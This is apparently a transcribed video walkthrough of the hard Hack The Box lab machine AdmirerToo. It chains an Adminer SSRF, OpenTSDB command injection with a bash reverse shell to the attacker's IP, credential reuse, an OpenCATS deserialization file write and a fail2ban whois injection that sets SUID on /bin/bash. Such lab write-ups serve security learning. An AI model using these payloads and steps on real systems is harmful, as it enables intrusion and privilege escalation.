Well, hello everyone, this is Mohammad Badruddin and today I'm going to solve another machine from Hackthebox. The machine name is AdmirerToo and the difficulty level of this machine is hard. So that's been said, without wasting time, let's just start with the reconnaissance phase, and I'm going to start with the nmap. So nmap space hyphen s capital V for the version enumeration, space hyphen s capital C for default scripts, and the target IP is 10.10.11.137 space hyphen O capital N. So I'm going to save the scan result in default.nmap because I already ran the scan to save the time. So I am going to show you the scan result, which is cat and default.nmap. So as you can see here, 3 ports are open. The port number 1 is port number 22, state is open, and the service running on it is SSH. The version of it is OpenSSH 7.9p1, most probably Debian. The second port, which is TCP port number 80, the state port is open. This is default for HTTP, and server running is Apache HTTPD 2.4.38. The last port is 4242. This is TCP, and that seems filtered port. VRML multi-use, fine. So this information is important, and I'm going to keep this information with me. So nmap scan result, paste that here. Okay, so without wasting time, I already open up the website running on port number 80. There are some dead links, so this is the dead link. Fine. Go down and there are some image and image galleries like this. So I already ran the GoBuster for directory enumeration once I solved this machine. So in GoBuster also there is nothing much important. Whatever you will get in the GoBuster, you will get in the page source. So there are common directories like CSS, JS and IMG, which is images. But the interesting part is if you visit IMG directory, and you will get bunch of images. So if you go down, you will see the server IP, and once you hover the cursor on it, in the left hand bottom side you will see there is an email that is webmaster@admirer-gallery, which is interesting. So we got the domain name. I already made a record in etc host file for admirer-gallery. So let's go and try to access .htb and http://. So the same website we have now, but if you go for the subdomain enumeration, so I did it with fuf tool. So fuf space -w for the word list, and I'm going to use the sec list. So user share word list, inside word list I put sec list, and discovery, inside discovery there is a directory DNS, and inside that there is a subdomain word list. I'm going to use this one. Then space -u to specify the URL, and the URL is http://admirer-gallery.htb. Then I need to specify host. So host : fuzz dot admirer -gallery.htb. Fine. And the number of threads I'm going to use 64, and I'm going to match the status code 200. So it will only show me the result having response code 200. Hit enter, Control C, because as you can see all the status code have 200. So I'm going to filter this result with the word. So 4572, I'm going to clear it and just add the switch for filter the word 4572, and hit enter, and this time it will show me the only valid subdomain, which is DB. So Control C, and I already created that record even in etc host file. So grep db.admirer gallery.htb in etc/host file. So as you can see, this is the IP and this is the subdomain and this is the domain. Fine. So go back here, and this time I am going to try to access db.admirer-gallery.htb new subdomain, and once we hit enter, we see here another application which is Adminer 4.7.8. and if I go to the page source, so we will see this is the important part. Here you can see the value for the authentication driver is server, and authentication server is the local host. Username is admirer_row. This is the password. So, and the database is admirer. So this is the password. That's why it's not asking us for the password, because the password is hard coded in the page source in the HTML file. So if we just hit enter, we will be directly logged in. There are many features open here, which is SQL command, import, export, but whatever feature you will use from here, it is not going to give you a lead to get remote code execution or find any vulnerability. If you see the database, only two databases are here. The one is Admirer and another one is information schema, and you cannot guess actually what database basically running with the application exactly. Fine. So I'm going to find out the vulnerability for Adminer 4.7.8 exploits. Hit enter and go to the CVE detail page. There is server side request forgery, this one, server side request forgery, and it exists between version 4 to 4.7.9, and we are using 4.7.8 here. So Ssrf may be there. So I'm going to open this link. Go down, and in the reference you will find many. So there is adminer.ssrf PDF. So open with Firefox. Fine. So I am not going into the description or in the impact. So I am directly go to the attack explanation and demonstration. So the following steps were used to demonstrate the attack. First, a Python server was started which listened on incoming connections and responded with a 301 redirect to an arbitrarily chosen host. So this is expected, because once we are talking about the server side request forgery, this is the most important part, that an attacker must have a controlled web server, and from target server it will forge the request to its own server, right? So in this example, the redirect was pointed at the AWS meta service, but we are not using AWS meta service. But the most important part is here. Then the Elasticsearch login module was used within the adminer to login the server running on the Python code. Fine. So as we see here, if we come here, just log out it, and if we see the page source, so in the page source you will find that the driver we are using here is server, but according to this document, POC document, we see that we need to use the Elasticsearch module. Fine. So let's see. Option, I set it 8000, but it's set on the Foxy proxy on 8080. So make it 8080, intercept is on. Come back here and open the burp suite. But before going to exploit that, we need two things. The first thing is we need a Ssrf server on which we can listen for the connection coming from the target machine, so which is already here. So open that, and this is the Python server. So you can copy it and paste it. I already did it. So if I show you here, admirer ssrf.py, so this is the code. Fine. Next is what I need to show you is if I come here, but I don't need this commit, I need this one. Go to the adminer, and inside adminer there are drivers. If you go in the drivers, these are the drivers. So we need to use this elastic. If we open this, you will find that if you want to use the driver, you can use it by just name it as elastic, right? Now we go back here and open the enable the burp proxy. Come here, intercept is on, come back here and enter. But before going to make this process, we need to start the Ssrf server. So Python 2.7 adminer ssrf.py space -p for the port, which is 80, space -i, which is the attacker IP. So 10.10.14.68, this is my IP. If I show you here, config turn 0, hit enter. So 10.10.14.68, and then the redirected URL. So 10.10.11.137, this is the server IP, and here it uses port number 4242. Fine. So hit enter. Now it's listening on port number 80. Go back here. So we need to use driver elastic. So elastic, and instead of localhost, I'm going to tell this request to authenticate from this server. So instead of server driver, I'm going to use elastic, and the server is gonna be 10.10.14.68. Come on, 68, yeah. So forward this request, and here as you can see, elastic and username this, forward it again, come back here, first come back here. So as you can see, you got 301 response code. That means Ssrf tested successfully. Now come back here. According to this document, it said you will get a JSON response, but because we are not using AWS thing, so we will get HTML documented error. But the most important part in this error is OpenTSDB. So that means OpenTSDB is used, but which version of this OpenTSDB we don't know. We can directly go to search. We can search here OpenTSDB exploits, but the problem is there are exploits like remote code execution, but the version is 2.4.0, and here in our case up to now we do not know which version is running. So for that, before going to the exploits, I'm going to the TSDB documentation. So come back here, open this document, and all these contents are here: installation, user guide, HTTP API, and there are HTTP API endpoints. So I'm going to endpoints, and all these endpoints are here. Among them, in the last you will find API/version. So if you want to know which version of OpenTSDB is running, so you need to visit this URI. So now here I'm going to close this, clear, and again I'm going to say API version, right? API version, and hit enter again. It's listening again. Come here, start the burp proxy, come here and enter again. So elastic, this is okay. Here you have to set elastic, and the request is going to be on this IP, forward and forward again. So once you make forward again, come back here. Yeah, we got 301 response, and come back here. Here you can see we get the version of OpenTSDB, which is 2.4.0. So come here, paste that, and let's say OpenTSDB. Fine. So now we know that the version of OpenTSDB, now we can access we can see the exploit. So OpenTSDB exploits, hit enter, and the first exploit we got is remote code execution. Let's visit this, and as you can see there is a proof of concept which is here. So in OpenTSDB there is a parameter which is Y range, and this parameter is actually vulnerable for the remote code execution. The snippet of the code is here, this one. So you can see this code, and this is the parameter which is vulnerable to remote code execution, right? So I'm going to take this query up to here, copy, come back here, paste that here, and also come back here, close this, clear, and this time instead of API version I am going to paste that POC to actually know that to actually execute the remote code execution. Fine. So but how we will know that this command is executed or not? So instead of this I am going to execute ping, and because this is URL, so instead of space I'm going to use URL encoded value of space. -c means number of counts. Again, instead of space, %20, and let's say 5 times I want to ping, and again instead of space $%20, and I am going to ping attacker PC, which is my PC. Fine. Hit enter, it's listening. And how we will know that the target machine is pinging us or not? So for this I'm going to capture the traffic through TCP dump. So TCP dump space -c, number of count 10, and space -i for the interface tunnel 0. So on this interface whatever ICMP traffic will come, and it will capture the 10 packets. Fine. And it's already listening. So now come back here again, start the burp proxy, enable the burp proxy on your browser, enter, come here. So the driver, you can see here, this is the driver. So driver is elastic, and the server is 10.10.14.68. Forward, come here first. We got the response, but we did not get any ICMP packet here. That means the command is not executed. Go here, and tons of errors. But the most important error is, if you see closely, you will find something which is that very, very important. So as you can see, no such name for matrix, and the matrix name is sys.cpu.nice. So this request actually did not find this metric. Fine. And now if I come back to see the request closely, here there is a parameter m, which value is m means metric, and the metric value is sys.cpu.nice. So this is actually not found by the application. That's why that error came and our command is not executed. So go back to the, close this, fine. Go back to the API version of OpenTSDB, go back again, and let's say suggest, go on this link, and here as you can see, if you want to know the metric, what metric is present on the server, so you can type, you can visit this URL, you can visit API and the endpoint is suggest, and there is a parameter to know the metric. So this time I'm going to use this. So copy and come back here, close this, clear API version. Yeah, instead of API version, I'm going to use API suggest, and this is the parameter value and its value is metric. Fine. So hit enter, come here, run this again, enter, and the driver name is gonna be elastic, and the server is 10.10.14.68, forward and forward. So come back here. Of course this time we will not get, because we are not testing the remote code execution. We want to know which metric is present. So as you can see, this metric is present. So instead of sys.cpu.nice, if we put here instead of sys.cpu.nice, if we put this metric, so it is gonna work. Now copy this again and come here, close, and instead of this, paste that, paste that, fine. And again, instead of this, let's say double quotes and ping %20 space -c, and again instead of space, let's say 5 times, again instead of space, we need to ping the IP 10.10.14.68. So ping space -c space 5 times space, this is the IP. Hit enter, come here, enable the burp proxy, which is already enabled, just hit enter, and elastic, and the server is 10.10.14.68. Forward, come here, and yeah, as you can see, we are getting the hits here. So echo request, echo response, this is the ICMP traffic. That means the remote code execution is successful. Now we can try for the reverse shell. So we are going to use reverse shell /bin/bash space -c, then /bin/bash space -i greater than and then /dev/tcp /10.10.14.68, and the port number I'm going to use is this, and 1, right? I think so. But we know that we need URL encoding, so just copy this and come here, let's say CyberChef, hit enter. So now URL encoding, yeah, this one, and just paste that here. Fine. Encode the special characters, and we got this. So copy this and come here, instead of this, just paste that and open a new tab. Let's say cd desktop Hackthebox AdmirerToo clear nc space hyphen nlvp port number 9090. So I'm listening here. This is already done. Listening on port 80. Come back here, enable the burp proxy on browser, enter, and here elastic, where is it, here, elastic, and 10.10.14.68, hit enter, forward again, come here and we got the reverse shell. So this is the once I did that machine, it took a really long time to understand everything and to make these payloads working and everything. So now we are in OpenTSDB. ID is this. Fine. So export term is equal to xterm. Clear. Let's say grep how many users, those who can run the bash. So /etc/pass wd. So there are two users, root and Jennifer, those can run the bin bash. I'm going to copy this and paste it here. Fine. So let's see, ls space hyphen la /home /Jennifer, enter, and user.txt is there. Nothing much interesting except user.txt, but one more thing here is interesting. Normally if you see files, listing of files, you will see the username, and same as username you find the group names, but here you can see the username is Jennifer but the group name is user. So that means there is a user group named as users and Jennifer is the member of that user. So in terms of privilege escalation and system enumeration, we can further investigate this user, that if this not investigate the user, we can investigate the groups, and we can investigate this group, what are the permissions this group has, and the writable and readable files or executable files on this group. Okay, so that's been said. The first thing is I want to see the web directory, ls space hyphen la. So there are two web directory. This is by default and this is the application directory adminer. So let's see, cd adminer, hit enter, ls space hyphen la, and there are plugins, index.php, and this one, adminer included. So exactly don't know, no idea what inside it, but I wanna first see index.php. So clear cat index.php, admirer object include once. So there is a directory, ls space hyphen la, the directory name is plugins, this one, and inside this directory there are other files like plugins.php and data/servers.php. So let's see, cd plugins, ls space hyphen la. Okay, so one click login. I think this is for the adminer web database application. Let's see, first cd data, ls space hyphen la, there is a directory servers.php, clear cat servers.php. Yeah, these are the credentials. So read only account for testing, this is the credential. So you maybe remember if I go to the page source. Yeah, so if you remember, there is authentication server, local host, this is the username, this is the password. So all this hard coded value comes from here, admirer. So but there is one more username or password for the local host array. So maybe that password is reused by the Jennifer user. So I would like to try this. Clear, I don't need this, clear SSH and Jennifer at 10.10.11.137, hit enter. Come here, let's just copy this value, go back to the first terminal and paste it here, hit enter, and yeah, that password works for Jennifer. So ls space hyphen la cat users.text and no, not users.text, it is actually user.text, and this is the first flag. So clear. Let's see ID. So as I mentioned earlier that the username is Jennifer and this user is a member of group users. Fine. So let's see. Let's enumerate more. So net state space hyphen tlpn, hit enter, and this is also interesting. Why? I will tell you in a minute. So I'm going to copy this and put it with me. Also the most important part is this. So not this, actually this. So copy and paste it here. Fine. And the username is Jennifer. Now why this is so important, because we can see that there are few services running on localhost. So 3306 default for MySQL, it means database is running on localhost. There is one web service, maybe this is web service, or maybe other service is running on port 8080, but this is suspicious for me. So first of all, I would like to see what's running on port number 8080. So curl http://127.0.0.1:8080. Fine. So hit enter, and there is a web page. So where is title? This is the title. So title is saying this is OpenCat's login page. So this is some kind of OpenCat application, and this is the login page. So if you come here, you will see the login form. So this is the login form, and the method used is post, and index.php m is equal to login. So I would like to see that. So for this, port forwarding. So the port is 8080, localhost, its port is 8080, and Jennifer at 10.10.11.137, hit enter, and from here I need to use this, copy, paste that here, hit enter. Address already in use, I know why, because in burp suite I'm using port 8080. So edit this port, let's say 8000. Fine, make it okay, and come back to the terminal, exit this, clear, and hit again, paste the same password, and this time we do not have any error. It means our port forwarding should work. So come here, http://127.0.0.1 : port number 8080, hit enter, and as you can see, opencat login is there. From where it takes this, I don't know, but let's see. Try some password, username passwords like admin password, password, hit enter, and didn't work as expected, because this machine level difficulty level is hard, so you will not get anything like this. But the important information is version information, and I'm going to keep it here. Opencats, paste the version. So now we can actually find the exploit on this. I don't need now this admin, I don't need this, and I don't need this, I don't need this, and from here I can search for the opencat exploits, hit enter. So we are using 0.9.5.2 and here it's 0.9.4 remote code execution. Let's see. There is PHP object injection, arbitrary file, object injection, but for this we need to log in the web application for opencat, and there is serialization. Fine. Let's see. First thing first, there is database running. We missed something. Clear Jennifer 10.10.11.137 and paste the password, which is this. Paste that here. Clear. Let's enumerate the system with linpiece. So cd/opt/ PEAS piece. Inside it there is linpiece, ls space -la, linpiece.ssh, linpiece.sh. So python 3 space -m http.server, port is gonna be 80. Fine. Come here, cd/temp, and let's say wget http://10.10.14.68/linpiece.sh and it's downloading. linpiece.sh.1 means there is already linpiece. So clear ls space -la, and linpiece is already there. So let's go and test on this terminal. So cd/temp and linpiece.sh, hit enter, and let's see what we will get from linpiece result. So linpiece is finished. Let's see what we got. Searching passwords in configuration files, and there are many credentials. So this is interesting because MySQL server is running. So let's just copy, paste that. Database name is catdev, and database password is this, and database user is this. So these three are more important. Demo password and other thing. So I'm going to copy this, come here, paste that here. Fine. Next thing is Let's see if there is anything interesting. So in backup file, we know one thing very well, that the application OpenCat web directory is in the /opt. Fine. So we need to remember this also. /opt/opencats. Yeah. Interesting thing is mail application is running. Exim send mail exim. So copy this, come here, paste that, and socket listening. And services. So I'm gonna copy this, come here, and paste that here. So I think these are the things which I need. So come back here, clear these. Now I want to access the MySQL space -h, which is gonna be localhost space -u, which is username. So username is going to be this. Sorry, username is cats. So cats space -p for the password. Hit enter. It is asking for the password. This is the password. Copy, come here and paste, hit enter, and we are in the database. So show databases. So we need to say use cats_dev. Fine. Now we are in the cats dev. So show tables. These are the tables, and interesting is users. So DSCRIBE describe user. So it will show us the columns inside the user table. So there is user ID, site ID, username, email, password. So we need username, password, and user ID. So select user_ID, comma user_name, comma we need passwords also. So password from user, and these are the hashes. So copy, come here and paste that here. Fine. So there is admin user, and because the database name is catdev, so maybe we can log in inside the OpenCat login page with the admin credentials. Come back here, but we need to crack this hash. So instead of cracking these hashes, first of all I need to know which hash is this. So come here and close this, clear hash id space -m, paste that hash, and this is MD2, MD5. Let's see how many characters are there. So echo space -n, paste that hash, pipe wc space -c. There are 32 characters. So that means it is MD5 or MD5, most probably MD5. So where is CyberChef? This is CyberChef. So let's see. MD5. There is MD5. Take it here. Close it. Take it here. And instead of this, I'm gonna say test123 is the password, and this is the hash value of this password. Come back here and let's try to change the password for admin. And for that, let's say update user set, and what we need to set is password is equal to the hashed value, fine, where user ID is 1. So user underscore ID is equal to 1, like this. Hit enter, and yeah, it's changed. So the same thing, the same query, if we run now, so you will see the difference. Before it is hash is this, now hash is this. And now if we come back to the open cats, so admin is the username, password is test123, and let's log in. Show password test123 tst123. Didn't work, why? And here the problem is why we can't log in. I just figure out that I did something wrong. Once I make the MD5 hashing on this test123 password, the output value is this. So I just copy this, but here I paste something else. I don't know from where I get this. Oh, this is the problem. Let's try to paste that again, the correct value. Yeah, this is the correct value. Hit enter, it's set. Now see, yeah, this one. So come back here in open cats and let's say test123 login, and yeah, we logged in. So because this unserialized vulnerability, to exploit it, we have to log in, and now as we can see here, we logged in. So because this is unserialized vulnerability, so we need a tool for deserialization, and there is a tool PHP GGC, which I already cloned the repository from the GitHub. So if we search here, now we don't need this. PHP GGC GitHub. So gadget chain, we need this, or from here you can clone this repository, PHP GGC, and clone the repository from here. The most important part is this gadget chain. Fine. So if you go in the gadget chain, you will find a lot of gadget chains here with which you can make deserialization, right? So I already have this here. Gadget chains are there, so no worries, we already have it. The next part is how we will exploit. So let's open the burp proxy. So we need to change the options here because we changed the port of the burp proxy. So edit, and instead of 8080, let's say 8000. Save it and come back to the burp proxy here. History is too much. Let's clear all this history. Okay, intercept is on. Come here and come here, go to the activities, m is equal to activity. Yeah, we need this parameter. Forward, come here, and this is the activity. Okay, let's see this activity, and if we follow this, so parameter activity and activity data grid. Fine. So take this from here. Basically, the most important thing is this activity data grid. So I'm going to take this value up to here, copy this, go to the decoder and just paste that and smart decode, and as you can see, this is the serialized value. PHP object injection vulnerability is there, and for that what we need to do is we need to test according to the POC. So it said that we can put the content in the file. First of all, I'm going to exit from here, clear, right? It's better to work here. So cd desktop Hackthebox AdmirerToo, clear, and cd/temp, hit enter, and here I'm gonna say echo, and let's put some content like well done, and send it to the file, let's say test.txt. Fine. So cat test.txt, hit enter, and the content is there. Well done. Fine. So now here we will actually deserialize this, and then the payload is generated by the PHP GGC, and we will send that payload in the request instead of this payload. Fine. So clear this and go back to this cd, where is it, come here, cd php ggc, clear, and to use it you can use it like ./php ggc space -u, and then space -- fast destruct, and we need to use the gazelle, so guzz le/fw1, and we need to send this in the temp directory of the target machine, and the file name is gonna be the test.txt, and my file is also in the temp, so temp test.txt. So this is the target file and this is the source which is on my machine. Hit enter and this cookie is generated here, so just copy this, come here and paste that here, smart decode, and as you can see it is generated this. Fine. So now what we need to do is capture the request again, and we will replace the value. So come back here, proxy, change this value from here up to here and paste that value and send it again forward. So come back here and go back to the terminal, and let's see if we get that file in the temp directory or not. Admirer key, not here. Okay, let's take this request into the repeater. Where is that request? This one. Send it to the repeater. Come here and let's send this again. Okay, ls space hyphen la test.text, not here. Clear. Let's run it one more time, but this time let's just change the home/Jennifer test.text, hit enter, take this from here, just copy it, come to the burp suite and change this value and paste it. Fine, send it again. It's sent or not? Let's see. So ls space hyphen la, hit enter. Not here. Let's see. Change the, because maybe that is the problem in the path. So /dev/shm. This path is always work. So hit enter and copy this value, copy selection, come here and come back here, paste, send the request again. I didn't send, why? Come here and cd/dev/shm ls space hyphen la, not came. Parameter activity, then activity data grid is equal to this one. Fine, let's send this. Yeah, that was the problem, because this http is on the enter. Now if I come here and ls space hyphen la once again, and as you can see the test.text file is there, and if we just cat this file, so you can see the serialized value is there. Expires is 1, discard equal to false, value is equal to well done, but with this value there are other values also. Test.text is created on the target machine, but the user is Devil and the group is Devil. Fine, and we need the root, so this will not work if we create something. So go back to the services here. So if you see closely, we find a service which is failed to ban, and this is interesting for us. Fine, so for failed to ban, it's installed on our machine, on the target machine. We can come here, let's see, fail to ban exploit, security vulnerabilities, remote code execution, but actually we don't know what exactly the version is. Let's see, come here, clear, fail to ban server. So fail to ban server space hyphen h and space hyphen v for the version. So space hyphen capital V for the version, and this is the version number for fail to ban. So I'm going to copy this, come here and paste that. Now 0.10.2, so 0.10.2 exploit we need. Let's see, open this. Code execution 7.5, server action.py, this version, and 0.6 through. Failed to ban is a daemon. Host can host that cause multiple authentication error in version 0.9.7 and pre-error 0.10.0. Through this, there is a vulnerability that leads to possible remote code execution in mailing action. Mail who is command mail from, yeah, this is what we can consider in this situation. So we need to find out, we need to make more enumeration. Let's see this one. So who is command, there is a file inside etc failed to ban. We need to make the who is configuration file, and this is the proof of concept. So inside etc there is jail.conf, and this should be the condition to succeed. And in the second part, it's saying we need to create an entry in the etc host file. Let's see, come back here, clear cd ls space -la /etc/host. So we can just read, we cannot write in etc host file. So the second condition is not true for us. So instead of making an entry, making a record in the etc host file, we can create who is file. Fine. So we will follow this. So cd/etc and jail, there is no jail. Let's say fail to ban. Yeah, it's there. ls space -la and jail.conf is inside failed to ban. So this is the configuration file for jail to ban. Cat jail.config jail.conf. This is the configuration file. Let's see. The file is here. They say jail.conf proof of concept and jail.local. So there is jail.local. So this is the file which we need to see, jail.local. And yeah, as you can see, this is the default configuration. So ignore IP, this ban time 60 seconds. And once any IP gets banned or blocked, it is going to send an email to the root from this email ID, and the sender name is failed to ban, MTA is mail, and action is this. Interesting. Fine. So this is default configuration. Fine. And the other thing is, if we go to the jail.d, which is the directory default for failed to ban, so cd jail.d ls space -la, and there is default Debian configuration. So cat default Debian configuration. So as you can see here, the SSH is enabled. So through the SSH, what we will do, we will try to authenticate root user through the SSH by inserting wrong password again and again. So once the authentication is wrong, so it is going to ban our IP, means my IP, and it will try to send the email to root user from this email. Fine. So but before this we are going to uh, create whois file on this target machine, right? And how we will do this? So the first thing is we are going to create a configuration file. Let's say as you can see here, because in this POC, proof of concept, they actually altered the host file, but we don't have access on the host file, so we will go with the whois file. Let's see if there is any whois file on the system or not. So ls space hyphen la slash user local etc and ls space hyphen la user local etc. There is no file here, no file, right? Clear that. So we need to make the whois file, and how we will do this? We will do it from here. Similarly, we will create as before we create the test.txt. Now I am going to create, because if I show you here cat slash dev slash shm slash test.txt. So as you can see, this value, it's started from here, fine, and it ends from here. So if we write something like this, close it, then big bracket, and then pipe it in the regex, dot means anything, and then just put my IP 10.10.14.68. so this is gonna work, because if you see this value, it's ending like this with the big bracket and that. So our value will be put here, then rest of the things will come, fine. So come here, let's say nano we can make who.text, fine, hit enter, and let's just take this value, copy, come here, paste that here, control O, enter, control X, fine, and now pass it again with the PHP ggc, and instead of this path we are going to say user local etc and make the whois file, and whois.conf file actually, and from here we have who.text, fine. So just hit enter and the value is generated. Copy this section, come to the burp suite and paste that here, send 200, okay, come back here and yeah, user local etc, and as you can see whois.conf file is there. So cat whois.conf in user local etc whois.conf, and as you can see we are here, fine. So now this value will act as the real value, fine. So it will be closed and then after this it will start, fine. Now what we need to do is we need to start the listener as mentioned here. So nc space hyphen nvl means, or lvp, nlvp we can write, and this is the port number 43 for the whois, and space hyphen c we need to specify for the command, and in the command we will serve them the command whatever we wanted to execute. So here I am going to clear, and let's echo chmod u plus s and /bin/bash into command command. Fine. Now hit enter, cat command command, so it's there. Clear. And now I am going to start the listener here. So nc space hyphen nlvp, and the port number is going to be 43 space hyphen c, and I'm gonna serve that as cat, and the name of the file is command command, right? Let's see here. Yeah, and also space hyphen k switch, so it will keep the connection. Let's see, space hyphen k. Fine. So hit enter, and before executing ls space hyphen la/bin/bash, so whatever command we put inside the command file chmod u plus s/bin/bash, so now as you can see there is no suid bit set, but once we once our command is executed, suid bit will be set on the bin bash. And now ssh root at 10.10.11.137, hit enter and put any random password here, then again any random password, then again any random password here, and here let's see, still that not works. Here again, one, two, three, four, five, six, and let's see here, still didn't work. Why? Because just wait a moment, I cat command, yeah, let's see, nano command command, and this is gonna be the escape character. Fine. So control X, clear, and do it one more time. So, and instead of space hyphen k here, we can put k here, same thing. Okay, and clear, and let's just try ssh. Anything, we should get a hit. Let's test this here, ls space hyphen la bin bash, still not. Let's try hydra. Started or not started up to now, hydra. now it's started. And this is hang. Now it will not work, so just close this. Control C, Control C, Control C, Control C. Come on. ls not working. So as you can see here, if we come here, there is no whois file. So maybe the whois file is itself deleting again and again. So we need to send that request again, which is this. Send it again. Let's see if whois file is there now. No. Let's see. Clear PHP whois.txt. Take this, copy, come here and paste that value, paste it and send it again. Why? Because of this. Now come here, clear, and now who is there? So the next part is we need to listen as soon as possible, cat command, and here we need to ssh root and 1 2 3 4 5 6. Come here, ls space hyphen la /bin/bash. Not set up to now. No. Again. And this time connect to host this port, connection refuse, and I am here stuck. What is that? This is also stuck. Let's see this one, also stuck. So come on, cancel, still stuck. mv who.txt to whois.txt, ls space hyphen la and whois.txt, cat whois.txt, and nano whois.txt, make space here, Control X, clear, and let's try to see cat command command. So change mod plus u plus s bin/bash. This is okay. So let's see. Clear php whois.conf. Okay, whois.txt, hit enter. Because the file name is changed, I put it whois.txt. Clear. Also I need to move whois.txt to whois.confconf. Hit enter. Now php whois.conf. Hit enter. Take this value, copy, come here and paste it here and hit enter. So now this whois file should be here and whois.conf. Cat, hit enter. Yeah, it's there. The next thing is we have the command file. Let's try. I am going to use move command command into test payload. Hit enter. Cat test payload, and yeah, this is there. Fine, everything is set. Again, listen on this port. Cat test payload. Listen this, and from this terminal SSH root. Bash, nothing, that doesn't work. Let's try to change the payload. And yeah, this time, as you can see, the connection is created, and this time if I try here bin bash and this is disconnected, come here, let's see, this is also hang. So what we can do here, clear, let's try to connect with Jennifer, and no, it's refusing. But now we know one thing, that we connected with this IP, means this machine, target machine. So we will wait a minute. Come on, the command is executed now. This is 100% sure because we got the connection message here, but this is still stuck. Now it's came. So ls space -la slash bin slash bash and yeah, as you can see, this time the SUID bit is set. So clear ls space -la bin bash. So now we just need to say slash bin slash bash space -p, hit enter, id who am I, and we are root. So cd slash root ls space -la and cat root.txt, and this is the root flag. So this is done. This machine is hard, really hard. And thank you so much for watching. If you have any query, please put in the comment section. See you in the next video. Bye.